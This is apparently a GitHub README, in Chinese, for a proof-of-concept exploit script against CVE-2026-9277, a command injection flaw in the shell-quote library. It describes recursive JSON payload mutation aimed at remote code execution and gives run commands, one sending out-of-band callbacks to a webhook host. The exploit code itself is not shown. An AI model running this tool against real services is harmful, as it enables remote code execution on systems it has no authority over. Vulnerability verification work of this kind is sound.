DylanZahedi/CVE-2026-9277

# CVE-2026-9277 - Shell-Quote 命令注入漏洞利用 这是一款专门的漏洞验证概念验证（PoC）利用脚本，旨在验证和演示 **CVE-2026-9277**——这是在旧版本 `shell-quote` 库（<= 1.8.3）中发现的结构性命令注入漏洞。 该扫描器对输入的 JSON payload 执行深度的结构化操作，通过递归遍历来暴露远程代码执行（RCE）攻击向量，并利用动态网络基准计时引擎来防止误报。 ## 主要功能 - **递归 JSON 遍历：** 自动检测并变异隐藏在多层嵌套 JSON 结构或类 GraphQL 配置中的目标数组。 - **组合变异矩阵：** 测试高级数组操作场景，包括特定索引插入、绝对列表覆盖和离散数组对。 - **自动化 OOB 架构：** 通过将 `{"op": "..."}` 组件与参数分离，处理高级带外（Out-of-Band, OOB）执行布局，从而成功绕过字符串隔离控制。 - **零噪音日志记录：** 静默执行引擎会过滤掉损坏/不可利用的 500 服务器内部错误响应，仅展示经验证的证据。 ## 安装与设置 请确保已安装 Python 3.10+ 及所需的依赖包： ``` git clone https://github.com/your-username/CVE-2026-9277.git cd CVE-2026-9277 pip install requests urllib3 ``` ## 执行示例 ### 示例 1：带有输出泄露的本地扫描 ``` python CVE-2026-9277.py -u "https://example.com/command" -b '{"message_tokens": ["Hello", "from", "normal user"]}' ``` ### 示例 2：针对嵌套字典结构的带外（OOB）测试 ``` python CVE-2026-9277.py -u "https://example.com/command" -b '{"user": {"commands": ["a", "b"]}}' -w "https://webhook.site/your-uuid-here" ```

标签：Maven, PoC, Python, Web安全, 命令注入, 无后门, 暴力破解, 漏洞验证, 蓝队分析, 逆向工具